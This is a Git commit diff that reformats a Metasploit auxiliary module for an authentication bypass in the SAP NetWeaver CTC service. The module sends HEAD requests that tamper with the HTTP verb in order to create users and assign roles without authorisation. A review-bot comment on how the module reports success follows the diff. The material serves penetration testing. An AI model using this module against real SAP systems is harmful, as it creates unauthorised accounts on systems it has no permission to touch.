up to date

bug/bundler_fix
jvazquez-r7 2013-05-14 14:48:58 -05:00
parent 07b3355a17
commit 83f1418f28
1 changed files with 26 additions and 22 deletions


@ -33,20 +33,23 @@ class Metasploit4 < Msf::Auxiliary
super( super(
'Name' => 'SAP CTC Service Verb Tampering (add user and add role)', 'Name' => 'SAP CTC Service Verb Tampering (add user and add role)',
'Description' => %q{ 'Description' => %q{
This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service. This module exploits an authentication bypass vulnerability in SAP NetWeaver
The service is vulnerable to verb tampering and allows for unauthorised user management. CTC service. The service is vulnerable to verb tampering and allows for unauthorised
SAP Note 1589525, 1624450 / DSECRG-11-041. user management. SAP Note 1589525, 1624450 / DSECRG-11-041.
}, },
'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']], 'References' =>
[
[ 'URL', 'http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/' ]
],
'Author' => ['nmonkee'], 'Author' => ['nmonkee'],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options([ register_options([
OptString.new('USER', [true, 'Username', nil]), OptString.new('USER', [true, 'Username to create']),
OptString.new('PASS', [true, 'Password', nil]), OptString.new('PASS', [true, 'Password for the new user']),
OptString.new('GROUP', [true, 'Group', nil]) OptString.new('GROUP', [true, 'Group for the new user'])
], self.class) ], self.class)
end end
def run_host(ip) def run_host(ip)
@ -58,22 +61,23 @@ class Metasploit4 < Msf::Auxiliary
def send_request(uri) def send_request(uri)
begin begin
print_status("[SAP] #{rhost}:#{rport} - sending request") vprint_status("#{rhost}:#{rport} - Sending request to the CTC service...")
res = send_request_raw({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'HEAD', 'method' => 'HEAD',
'headers' =>{ 'ctype' => 'text/xml; charset=UTF-8',
'Cookie' => 'sap-usercontext=sap-language=EN', 'cookie' => 'sap-usercontext=sap-language=EN'
'Content-Type' => 'text/xml; charset=UTF-8',} })
}, 45)
if res if res
vprint_error("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s) vprint_error("#{rhost}:#{rport} - Error code: " + res.code.to_s)
vprint_error("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s) vprint_error("#{rhost}:#{rport} - Error title: " + res.message.to_s)
vprint_error("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s) vprint_error("#{rhost}:#{rport} - Error message: " + res.body.to_s)
end else
rescue ::Rex::ConnectionError print_good("User successfully added")
print_error("#{rhost}:#{rport} - Unable to connect")
return
end end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Unable to connect")
return
end
end end
end end
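Review bot: In the new `send_request`, the `else` branch prints "User successfully added" whenever `send_request_cgi` returns nil, but a nil result also covers a timeout or a silently dropped request, so the module can report an account that was never created. The explicit 45-second timeout of the old `send_request_raw` call is gone as well, which makes a nil return more likely against a slow host. Unless an empty reply is the known success signal for this service (in which case a comment should say so), I would word the branch as unconfirmed and keep the host prefix every other message uses: `print_status("#{rhost}:#{rport} - No response received, user creation not confirmed")`. The `if res` branch also reports every response as an error, whatever its status code, so `res.code` should be checked before it is logged as a failure.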